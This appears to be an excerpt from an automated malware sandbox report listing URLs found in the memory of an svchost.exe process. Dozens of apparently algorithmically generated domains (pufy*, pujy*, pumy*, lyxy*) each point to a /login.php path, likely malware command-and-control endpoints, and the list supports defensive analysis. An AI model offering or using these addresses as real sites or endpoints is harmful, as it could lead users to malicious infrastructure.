    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573059018.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyvyn.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2584954171.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589741784.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywen.com/login.php
    Source: svchost.exe, 00000001.00000003.2811743937.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2806806539.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815662104.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819179074.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808913849.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809323268.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxyd.com/
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2229330427.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770277395.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2198716545.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybyv.com/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycog.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477822370.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771384129.0000000007253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.php
    Source: svchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535357779.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycyq.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2842904023.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856628497.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837121931.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582941413.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2850230892.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988415844.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860881209.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/login.php
    Source: svchost.exe, 00000001.00000003.2591407589.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589901555.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587032429.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590120821.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588954366.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589741784.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufymiv.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767316843.000000000721A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypiq.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufytev.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570797195.0000000005F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufytip.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybev.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybyq.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545922142.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2581882189.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyduv.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815248355.00000000072DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814952372.000000000724D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygaq.com/
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2847936839.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
    Source: svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2806806539.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/ww25.lyxynyx.com
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2765596647.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766830441.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2764622957.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2761539711.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2762452123.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2704766702.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2734882543.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2709512878.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737092972.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujymip.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557868147.0000000005F18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyteq.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835961971.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybal.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycug.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577542227.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2580215394.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygil.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793548404.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjev.com/
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjev.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613870670.000000000BEC4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617620564.000000000BEC5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyleg.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumylel.com/login.php
    Source: svchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyliq.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815248355.00000000072DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytol.com/login.php
